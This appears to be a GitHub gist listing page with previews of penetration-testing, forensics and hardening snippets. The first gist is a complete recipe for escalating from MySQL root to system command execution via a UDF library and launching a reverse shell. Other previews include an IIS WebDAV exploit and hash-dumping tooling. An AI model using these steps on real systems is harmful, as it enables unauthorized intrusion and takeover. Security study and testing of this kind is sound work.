
@p0c
p0c / mysql_root_to_system_root
Last active August 14, 2021 23:58
#pentest #recipe: mysql root -> system root (linux)
# download lib_mysqludf_sys.so from https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql
# (currently not present in kali's sqlmap, only the windows one, the same for metasploit...)
mysql> use mysql;
mysql> create table test(line blob);
mysql> insert into test values(load_file('/tmp/lib_mysqludf_sys.so'));
mysql> select * from test into dumpfile '/usr/lib/lib_mysqludf_sys.so';
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
mysql> select sys_exec('./reverse_shell &');
@graysonchao
graysonchao / DFIR.md
Last active January 19, 2024 11:51
Digital Forensics & Incident Response Notes (cleanup in progress)

#DFIR These are my notes from BlackHat 2016 Digital Forensics & Incident Response Training

## Windows Drive Forensics

- NTFS: host default <---- Course focus
- ReFS: eventually the host default (not yet) <---- basically nothing
- FAT: external drives <--- a little focus
- ExFat: high-cap external drives <--- basically nothing

Our tools will mostly deal with NTFS and FAT.

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@mgeeky
mgeeky / iis_webdav_upload.py
Last active July 25, 2023 17:39
Microsoft IIS WebDAV Write Code Execution exploit (based on Metasploit HDM's <iis_webdav_upload_asp> implementation)
#!/usr/bin/python
import requests
import string
import random
import sys

def randstring(N = 6):
    return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(N))
@unfo
unfo / enum.sh
Created April 7, 2017 14:30
Linux priv esc. Might be outdated script versions
#!/bin/bash
BLACK="\033[30m"
RED="\033[31m"
GREEN="\033[32m"
YELLOW="\033[33m"
BLUE="\033[34m"
PINK="\033[35m"
CYAN="\033[36m"
WHITE="\033[37m"
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active April 6, 2025 17:09
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@vector-sec
vector-sec / Get-Token.ps1
Created August 10, 2017 17:51
PowerShell script to enumerate all Process and Thread tokens.
function Get-Token
{
    foreach($proc in (Get-Process))
    {
        if($proc.Id -ne 0 -and $proc.Id -ne 4)
        {
            try
            {
                $hProcess = OpenProcess -ProcessId $proc.Id -DesiredAccess PROCESS_QUERY_LIMITED_INFORMATION
            }
@nitefood
nitefood / README.md
Last active May 8, 2023 00:45
ASN/IP/Route/hostname command line lookup tool to map any network to the corresponding ASN and prefix

This gist has moved to its own repository HERE

See you there!

@todmephis
todmephis / cis_centos7_hardening.sh
Last active February 26, 2025 10:00
Hardening CentOS 7 CIS script
#!/bin/bash
MODPROBEFILE="/etc/modprobe.d/CIS.conf"
#MODPROBEFILE="/tmp/CIS.conf"
ANSWER=0

analyze_part () {
    if [ "$#" != "1" ]; then
        options="$(echo $@ | awk 'BEGIN{FS="[()]"}{print $2}')"
        echo "[+]$@"
        apply_part_rule $1
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description: Performs various techniques to dump hashes from the
# remote machine without executing any agent there.
# For SAM and LSA Secrets (including cached creds)
# we try to read as much as we can from the registry